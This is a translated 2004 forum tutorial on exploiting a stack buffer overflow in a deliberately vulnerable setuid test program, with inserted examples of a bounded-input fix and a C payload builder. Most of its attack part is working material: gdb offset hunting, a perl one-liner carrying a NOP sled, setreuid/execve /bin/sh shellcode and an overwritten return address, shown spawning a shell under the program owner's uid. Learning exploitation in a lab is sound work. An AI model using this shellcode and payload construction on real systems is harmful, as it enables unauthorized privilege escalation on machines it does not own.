   Solving a BOF: Just Follow Along #1

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181

Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com

In the listing below, the lines marked as comments (//) are the explanations.
I put this together so that beginners can follow along easily.
I tested it on my wargame server.
I prepared two versions:
one that puts the shellcode directly into the buffer, and one that uses an egg program.

gcc version information:
[root@localhost .test]# gcc -v      
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)

[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
// Let's set up the test environment. I used gets(), which should never be used. ^^
[root@localhost .test]# cat > testApp.c
#include <stdio.h>
void main(int argc , char** argv)
{
        char buffer[200];

        printf("type ur words : ");
        gets(buffer);
        printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
total 28
drwxr-xr-x    2 root     root         4096 Apr 10 00:08 .
drwxr-xr-x   21 root     root         4096 Apr  9 23:17 ..
-rwsr-x---    1 recluse8 recluse7    13842 Apr 10 00:08 testApp
-rw-r--r--    1 root     root          155 Apr 10 00:08 testApp.c
[root@localhost .test]#

// Let's try the program with a perl one-liner: 300 'A's on stdin. The trailing `cat` keeps stdin open, so a shell spawned later can still read our commands.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp


Segmentation fault
[root@localhost .test]#

// The segmentation fault tells us a BOF is happening: 300 bytes went into a 200-byte buffer and ran over main's saved return address.
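As an added example (not part of ganseo's original post), here is the fix a maintainer would make to testApp.c: replace gets(buffer) with a bounded line reader that cannot write past the 200-byte buffer and that tells the caller when the input had to be cut. The input strings below are constructed for the demonstration, tmpfile() stands in for the pipe the post uses, and the names read_line, run_demo and demo_* are mine.

```c
#include <stdio.h>
#include <string.h>

enum { LINE_OK = 0, LINE_TRUNCATED = 1, LINE_EOF = -1 };

/* Bounded replacement for the gets(buffer) call in testApp.c: reads at most
 * n-1 bytes, strips the newline, and drains the rest of an over-long line so
 * the leftover bytes cannot leak into the next read. Returns LINE_OK,
 * LINE_TRUNCATED (input was longer than the buffer) or LINE_EOF (nothing read). */
int read_line(FILE *in, char *buf, size_t n)
{
    if (n == 0)
        return LINE_EOF;
    if (fgets(buf, (int)n, in) == NULL) {
        buf[0] = '\0';
        return LINE_EOF;
    }
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {             /* the whole line fit */
        buf[len] = '\0';
        return LINE_OK;
    }
    /* No newline within n-1 bytes: either the input ended here or the line goes on. */
    int c, dropped = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;
    return dropped ? LINE_TRUNCATED : LINE_OK;
}

/* Feeds a constructed input through read_line into a 200-byte buffer, the same
 * size testApp.c declares. tmpfile() stands in for the pipe used in the post.
 * Copies the stored string to out (at least 200 bytes) and returns the status. */
int run_demo(const char *input, size_t input_len, char *out)
{
    char buffer[200];
    FILE *f = tmpfile();
    if (f == NULL)
        return LINE_EOF;
    fwrite(input, 1, input_len, f);
    rewind(f);
    int status = read_line(f, buffer, sizeof buffer);
    fclose(f);
    strcpy(out, buffer);
    return status;
}

/* The post's crash input: 300 'A's and a newline. gets() stored all 300 into
 * the 200-byte buffer, running 100 bytes past it; read_line stores 199 and
 * reports the truncation instead. */
int demo_overflow_attempt(void)
{
    char input[301], out[200];
    memset(input, 'A', 300);
    input[300] = '\n';
    return run_demo(input, sizeof input, out) == LINE_TRUNCATED && strlen(out) == 199;
}

/* A line that exactly fills the buffer (199 bytes + newline) is not a truncation. */
int demo_exact_fit(void)
{
    char input[200], out[200];
    memset(input, 'A', 199);
    input[199] = '\n';
    return run_demo(input, sizeof input, out) == LINE_OK && strlen(out) == 199;
}

/* An ordinary short line is stored without its newline. */
int demo_normal(void)
{
    char out[200];
    return run_demo("hello\n", 6, out) == LINE_OK && strcmp(out, "hello") == 0;
}

int main(void)
{
    printf("overflow attempt handled: %d\nexact fit: %d\nnormal line: %d\n",
           demo_overflow_attempt(), demo_exact_fit(), demo_normal());
    return 0;
}
```

The return code matters: a program that silently truncates is safe from the overflow but may still act on half a line, so the caller should treat LINE_TRUNCATED as an error rather than printing the partial buffer.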

* The first method.
* First, disassemble with gdb to find the address of the buffer we are going to fill and where the return address lives.
* For the background knowledge, see the documents at ganseo.com.
* From here on we will put our shellcode where the A's went, and write the address of that shellcode
* into main's return address slot. ^^
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>:       push   %ebp
0x8048491 <main+1>:     mov    %esp,%ebp
0x8048493 <main+3>:     sub    $0xd8,%esp
// The compiler reserves this much for buffer plus padding (dummy): 0xd8 = 216 in decimal, not 200.
// So we can expect our input to land at ebp - 0xd8, which we will confirm below.
0x8048499 <main+9>:     sub    $0xc,%esp
0x804849c <main+12>:    push   $0x8048548
0x80484a1 <main+17>:    call   0x804836c <printf>
0x80484a6 <main+22>:    add    $0x10,%esp
0x80484a9 <main+25>:    sub    $0xc,%esp
0x80484ac <main+28>:    lea    0xffffff28(%ebp),%eax
0x80484b2 <main+34>:    push   %eax
0x80484b3 <main+35>:    call   0x804833c <gets>
0x80484b8 <main+40>:    add    $0x10,%esp
0x80484bb <main+43>:    sub    $0x8,%esp
0x80484be <main+46>:    lea    0xffffff28(%ebp),%eax
0x80484c4 <main+52>:    push   %eax
0x80484c5 <main+53>:    push   $0x8048559
0x80484ca <main+58>:    call   0x804836c <printf>
0x80484cf <main+63>:    add    $0x10,%esp
0x80484d2 <main+66>:    leave  
0x80484d3 <main+67>:    ret    
0x80484d4 <main+68>:    nop    
0x80484d5 <main+69>:    nop    
0x80484d6 <main+70>:    nop    
0x80484d7 <main+71>:    nop    
0x80484d8 <main+72>:    nop    
0x80484d9 <main+73>:    nop    
0x80484da <main+74>:    nop    
0x80484db <main+75>:    nop    
0x80484dc <main+76>:    nop    
0x80484dd <main+77>:    nop    
0x80484de <main+78>:    nop    
0x80484df <main+79>:    nop    
End of assembler dump.

// Find ebp, then work out where the return address is.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax            0x40158ac0       1075153600
ecx            0x0      0
edx            0x0      0
ebx            0x40159fd0       1075158992
esp            0xbffffab8       0xbffffab8        
ebp            0xbffffab8       0xbffffab8                // This is ebp. The saved return address sits at ebp + 4, so that is where the address of our shellcode has to go; the buffer itself starts at ebp - 0xd8 = 0xbffff9e0.
esi            0x40015e4c       1073831500
edi            0xbffffb24       -1073743068
eip            0x8048493        0x8048493
eflags         0x396    918
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400458fe       1074026750
foseg          0x2b     43
fooff          0x808fc74        134806644
fop            0x2e9    745
xmm0           0x00000000000000000000000000000000
xmm1           0x00000000000000000000000000000000
xmm2           0x00000000000000000000000000000000
xmm3           0x00000000000000000000000000000000
xmm4           0x00000000000000000000000000000000
xmm5           0x00000000000000000000000000000000
xmm6           0x00000000000000000000000000000000
xmm7           0x00000000000000000000000000000000
mxcsr          0x1f80   8064

(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA

Breakpoint 1, 0x080484ca in main ()

(gdb) x/100bx 0xbffff9d0
0xbffff9d0:     0x59    0x85    0x04    0x08    0xe0    0xf9    0xff    0xbf
0xbffff9d8:     0x74    0x61    0xdf    0x03    0xa0    0xfa    0xff    0xbf
0xbffff9e0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41        // As predicted, the A's (0x41) start at ebp - 0xd8 = 0xbffff9e0. The two words just before it, 0x08048559 and 0xbffff9e0, are the format string and buffer pointer pushed for the printf call we stopped at.
0xbffff9e8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x00
0xbffff9f0:     0xfc    0x1b    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffff9f8:     0x01    0x00    0x00    0x00    0xa0    0x81    0x04    0x08
0xbffffa00:     0x94    0x60    0x01    0x40    0x8e    0xff    0x77    0x01
0xbffffa08:     0x8e    0xff    0x77    0x01    0xd0    0xfa    0xff    0xbf
0xbffffa10:     0xf8    0x5e    0x01    0x40    0x4c    0x82    0x04    0x08
0xbffffa18:     0x10    0x69    0x69    0x0d    0x5c    0xfa    0xff    0xbf
0xbffffa20:     0xec    0x46    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffffa28:     0xc0    0x66    0x01    0x40    0x01    0x00    0x00    0x00
0xbffffa30:     0x00    0x00    0x00    0x00

// Now we know the address our shellcode will sit at (0xbffff9e0) and the address of the slot the shellcode address must go into (ebp + 4),
// so let's put together a simple perl one-liner. For the shellcode itself, see the documents...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)

// shellcode: 63 bytes, plus the trailing \x00 that gets() also stores = 64 bytes
// bytes up to main's return address: 216 (buffer + padding) + 4 (saved ebp) = 220, so 156 NOPs + 64 bytes of shellcode fill it exactly and the next 4 bytes overwrite the return address
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp

type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF  V
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)
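As an added example (not from the post), the following C program builds the same 224-byte payload the perl one-liner sends and checks the arithmetic the post derives: 0xd8 + 4 = 220 bytes to the return-address slot, so 156 NOPs plus the 64-byte shellcode (the 63 bytes the post counts plus its trailing \x00) end exactly at the slot. It also verifies two things the post relies on but does not spell out: that the shellcode's jmp/call/pop offsets are self-consistent, and that no byte in the payload is 0x0a, which gets() would treat as end of line. The constants (frame size, 0xbffff9e0, the shellcode bytes) are taken from the post; the function names are my own. The payload is only built in memory, not executed.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Values taken from the post's gdb session. */
#define FRAME_SIZE  0xd8u                 /* sub $0xd8,%esp: buffer[200] plus padding */
#define RET_OFFSET  (FRAME_SIZE + 4u)     /* also step over the saved ebp: 220 */
#define BUF_ADDR    0xbffff9e0u           /* ebp - 0xd8 with ebp = 0xbffffab8 */

/* The post's shellcode: setreuid(1008, 1008), then execve("/bin/sh").
 * As a string literal it carries the trailing NUL, the same 64 bytes the
 * perl one-liner sends and gets() stores. */
static const unsigned char shellcode[] =
    "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
    "/bin/sh";
#define SHELLCODE_LEN sizeof(shellcode)   /* 64 */

static unsigned char g_payload[256];

/* Lays out NOP sled | shellcode | return address, as the perl one-liner does:
 * the sled is sized so the shellcode ends exactly at the return-address slot.
 * Returns the payload length, or 0 if the shellcode cannot fit before the slot. */
size_t build_payload(unsigned char *out, size_t cap, size_t frame_size,
                     const unsigned char *sc, size_t sc_len, uint32_t ret_addr)
{
    size_t ret_off = frame_size + 4;                  /* buffer + saved ebp */
    if (sc_len > ret_off || cap < ret_off + 4)
        return 0;
    size_t sled = ret_off - sc_len;                   /* 220 - 64 = 156, as in the post */
    memset(out, 0x90, sled);
    memcpy(out + sled, sc, sc_len);
    for (int i = 0; i < 4; i++)                       /* little-endian: e0 f9 ff bf */
        out[ret_off + i] = (unsigned char)(ret_addr >> (8 * i));
    return ret_off + 4;
}

/* Builds the post's exact payload into g_payload and returns its length (224). */
size_t build_demo_payload(void)
{
    return build_payload(g_payload, sizeof g_payload, FRAME_SIZE,
                         shellcode, SHELLCODE_LEN, BUF_ADDR);
}

/* gets() stops only at '\n', so a NUL inside the payload is harmless but a
 * 0x0a byte anywhere (shellcode or address) would cut it short. */
int survives_gets(const unsigned char *p, size_t len)
{
    return memchr(p, '\n', len) == NULL;
}

/* Checks the jmp/call/pop trick that makes the shellcode position independent:
 * the first 0xEB jmp must land on an 0xE8 call whose rel32 target is the
 * pop %esi (0x5E) right after the jmp. Returns the offset of the string the
 * call pushed ("/bin/sh" here), or -1 if the offsets do not line up. */
int check_jmp_call(const unsigned char *sc, size_t len)
{
    for (size_t j = 0; j + 1 < len; j++) {
        if (sc[j] != 0xeb)
            continue;
        size_t t = j + 2 + (size_t)(int8_t)sc[j + 1];           /* rel8 target */
        if (t + 5 > len || sc[t] != 0xe8)
            return -1;
        uint32_t raw = (uint32_t)sc[t + 1] | (uint32_t)sc[t + 2] << 8 |
                       (uint32_t)sc[t + 3] << 16 | (uint32_t)sc[t + 4] << 24;
        size_t back = t + 5 + (size_t)(int32_t)raw;             /* rel32 target */
        if (back != j + 2 || sc[back] != 0x5e)
            return -1;
        return (int)(t + 5);
    }
    return -1;
}

/* The uid baked into the setreuid() prefix: mov $0x3f0,%cx is 66 b9 f0 03. */
unsigned shellcode_uid(const unsigned char *sc)
{
    return sc[4] | (unsigned)sc[5] << 8;
}

int main(void)
{
    size_t n = build_demo_payload();
    printf("%zu bytes, ret slot at %u, /bin/sh at +%d, uid %u, gets-safe %d\n",
           n, RET_OFFSET, check_jmp_call(shellcode, SHELLCODE_LEN),
           shellcode_uid(shellcode), survives_gets(g_payload, n));
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", g_payload[i]);
    putchar('\n');
    return 0;
}
```

The hex dump it prints is byte for byte what the one-liner feeds to testApp. The address 0xbffff9e0 only holds for the post's setup (no stack randomization, the same environment size under gdb and at the shell); on a system with ASLR the buffer moves between runs, which is why the NOP sled is there at all and why a single fixed address is not enough on modern targets.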


  Hit : 14926     Date : 2004/04/12 02:01

singalnnn I have no idea what this is saying... 2004/04/13
Totory What is this even saying -_- 2004/04/14
dz¸²È­»ê If you don't understand this, study BOF from the basics. It explains the practical part in detail... why.. 2004/04/16
dlxorud90 Where does one study the basics? 2004/04/20
ssuckies It's www.ganseo.com ^^ 2004/04/22
UNIXSVR4 lol, shellcode is such a hassle... 2007/07/16
UNIXSVR4 You're really amazing, explaining BOF this easily... I had such a hard time learning it.. 2007/07/16